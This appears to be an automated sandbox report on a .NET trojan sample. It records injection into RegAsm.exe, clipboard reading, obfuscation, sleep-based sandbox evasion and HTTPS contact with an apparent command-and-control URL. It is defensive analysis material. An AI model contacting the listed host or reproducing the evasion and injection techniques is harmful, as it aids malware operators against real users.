Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/apim

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004297F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_004297F0

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004297F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_004297F0

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF31B4	0_2_00CF31B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043406B	3_2_0043406B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042EB21	3_2_0042EB21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BFE1	3_2_0040BFE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040181E	3_2_0040181E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00435830	3_2_00435830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004070A0	3_2_004070A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414160	3_2_00414160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00435110	3_2_00435110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004201C0	3_2_004201C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C1E0	3_2_0041C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CA40	3_2_0041CA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00410A4B	3_2_00410A4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00419A55	3_2_00419A55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404A10	3_2_00404A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411220	3_2_00411220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00432A30	3_2_00432A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00425342	3_2_00425342
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00410B4D	3_2_00410B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041EB5F	3_2_0041EB5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00423300	3_2_00423300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00436B00	3_2_00436B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407BE0	3_2_00407BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406B80	3_2_00406B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DB80	3_2_0042DB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DBA2	3_2_0041DBA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004053B0	3_2_004053B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00423C24	3_2_00423C24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00403C30	3_2_00403C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004354E0	3_2_004354E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CC80	3_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402480	3_2_00402480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00435492	3_2_00435492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411D50	3_2_00411D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00413555	3_2_00413555
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040C510	3_2_0040C510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5E0	3_2_0040B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00405E40	3_2_00405E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CE70	3_2_0041CE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00436E10	3_2_00436E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004086F0	3_2_004086F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CF42	3_2_0041CF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407750	3_2_00407750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DF69	3_2_0041DF69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00420710	3_2_00420710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00403FD0	3_2_00403FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A7D8	3_2_0041A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040EFE0	3_2_0040EFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401F98	3_2_00401F98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418F9A	3_2_00418F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00434FB0	3_2_00434FB0

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004091D0 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004099A0 appears 105 times

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1252293838.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000000.1232989270.00000000004C6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameConsoleApp66.exe: vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Binary or memory string: OriginalFilenameConsoleApp66.exe: vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Settings.cs

Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/1@3/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_0042EB21

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Mutant created: NULL

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\ConsoleApp66.pdb source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Binary contains a suspicious time stamp

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: 0x8B22E0EF [Mon Dec 21 13:53:51 2043 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF2298 push edx; retf 5500h	0_2_00CF2586
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF05C9 push esp; retf 0000h	0_2_00CF05CA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF0598 push esp; retf 0000h	0_2_00CF05BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF0505 push eax; retf 0000h	0_2_00CF050A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF0605 push esp; retf 0000h	0_2_00CF060A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043DABC push eax; retn 0041h	3_2_0043DABD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043D5A0 push edi; retn 0041h	3_2_0043D5A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043D63E push eax; iretd	3_2_0043D669

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory allocated: CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory allocated: 2780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory allocated: 4780000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Window / User API: threadDelayed 3224			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Window / User API: threadDelayed 1173			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6756	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 5920	Thread sleep count: 3224 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 5920	Thread sleep count: 1173 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6328	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
